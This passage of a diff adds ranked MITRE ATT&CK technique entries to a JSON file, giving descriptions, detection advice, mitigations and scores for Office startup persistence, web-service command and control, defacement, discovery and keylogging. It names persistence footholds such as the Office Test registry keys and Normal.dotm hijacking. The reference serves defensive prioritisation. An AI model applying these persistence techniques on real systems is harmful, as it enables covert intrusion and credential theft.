movement techniques such as Remote Services, SMB/Windows Admin Shares, or Windows Remote Management.", + "url": "https://attack.mitre.org/techniques/T1134/005", + "detection": "Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + } + ] + } + ] + }, + { + "rank": 74, + "tid": "T1137", + "name": "Office Application Startup", + "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)", + "url": "https://attack.mitre.org/techniques/T1137", + "detection": "Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.\nMany Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)\nMicrosoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool Ruler can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)", + "score": 0.8504457255114286, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [ + { + "tid": "T1137.001", + "name": "Office Application Startup: Office Template Macros", + "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.", + "url": "https://attack.mitre.org/techniques/T1137/001", + "detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1137.002", + "name": "Office Application Startup: Office Test", + "description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\nThere exist user and global Registry keys for the Office Test feature:\n
    \n
  • HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf
    • \n
  • HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf
    • \n
\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.", + "url": "https://attack.mitre.org/techniques/T1137/002", + "detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\nConsider monitoring Office processes for anomalous DLL loads.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1137.003", + "name": "Office Application Startup: Outlook Forms", + "description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\nOnce malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)", + "url": "https://attack.mitre.org/techniques/T1137/003", + "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool Ruler can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1137.004", + "name": "Office Application Startup: Outlook Home Page", + "description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\nOnce malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)", + "url": "https://attack.mitre.org/techniques/T1137/004", + "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool Ruler can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1137.005", + "name": "Office Application Startup: Outlook Rules", + "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\nOnce malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)", + "url": "https://attack.mitre.org/techniques/T1137/005", + "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified PRPR_RULE_MSG_NAME and PR_RULE_MSG_PROVIDER properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool Ruler can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1137.006", + "name": "Office Application Startup: Add-ins", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ", + "url": "https://attack.mitre.org/techniques/T1137/006", + "detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + } + ] + }, + { + "rank": 75, + "tid": "T1211", + "name": "Exploitation for Defense Evasion", + "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.", + "url": "https://attack.mitre.org/techniques/T1211", + "detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution or evidence of Discovery.", + "score": 0.8417428242857143, + "network_score": 0.2, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1019", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "url": "https://attack.mitre.org/mitigations/M1019" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 76, + "tid": "T1102", + "name": "Web Service", + "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "url": "https://attack.mitre.org/techniques/T1102", + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "score": 0.8381123850076191, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [ + { + "tid": "T1102.001", + "name": "Web Service: Dead Drop Resolver", + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "url": "https://attack.mitre.org/techniques/T1102/001", + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1102.002", + "name": "Web Service: Bidirectional Communication", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "url": "https://attack.mitre.org/techniques/T1102/002", + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1102.003", + "name": "Web Service: One-Way Communication", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "url": "https://attack.mitre.org/techniques/T1102/003", + "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + } + ] + }, + { + "rank": 77, + "tid": "T1491", + "name": "Defacement", + "description": "Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. ", + "url": "https://attack.mitre.org/techniques/T1491", + "detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "score": 0.8367476190476191, + "network_score": 0.2, + "file_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "subtechniques": [ + { + "tid": "T1491.001", + "name": "Defacement: Internal Defacement", + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)", + "url": "https://attack.mitre.org/techniques/T1491/001", + "detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ] + }, + { + "tid": "T1491.002", + "name": "Defacement: External Defacement", + "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) External Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.(Citation: Trend Micro Deep Dive Into Defacement)", + "url": "https://attack.mitre.org/techniques/T1491/002", + "detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ] + } + ] + }, + { + "rank": 78, + "tid": "T1005", + "name": "Data from Local System", + "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\nAdversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.", + "url": "https://attack.mitre.org/techniques/T1005", + "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.8310529156771429, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ], + "subtechniques": [] + }, + { + "rank": 79, + "tid": "T1082", + "name": "System Information Discovery", + "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nTools such as Systeminfo can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)", + "url": "https://attack.mitre.org/techniques/T1082", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.", + "score": 0.8187705714285713, + "network_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 80, + "tid": "T1049", + "name": "System Network Connections Discovery", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)\nUtilities and commands that acquire this information include netstat, \"net use,\" and \"net session\" with Net. In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\".", + "url": "https://attack.mitre.org/techniques/T1049", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.8127238095238096, + "process_score": 0.2, + "file_score": 0.2, + "cloud_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 81, + "tid": "T1056", + "name": "Input Capture", + "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture).", + "url": "https://attack.mitre.org/techniques/T1056", + "detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. SetWindowsHook, GetKeyState, and GetAsyncKeyState)(Citation: Adventures of a Keystroke), monitoring for malicious instances of Command and Scripting Interpreter, and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.", + "score": 0.8125875447619046, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1056.001", + "name": "Input Capture: Keylogging", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when OS Credential Dumping efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n
    \n
  • Hooking API callbacks used for processing keystrokes. Unlike Credential API Hooking, this focuses solely on API functions intended for processing keystroke data.
    • \n
  • Reading raw keystroke data from the hardware buffer.
    • \n
  • Windows Registry modifications.
    • \n
  • Custom drivers.
    • \n
  • Modify System Image may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)
    • \n
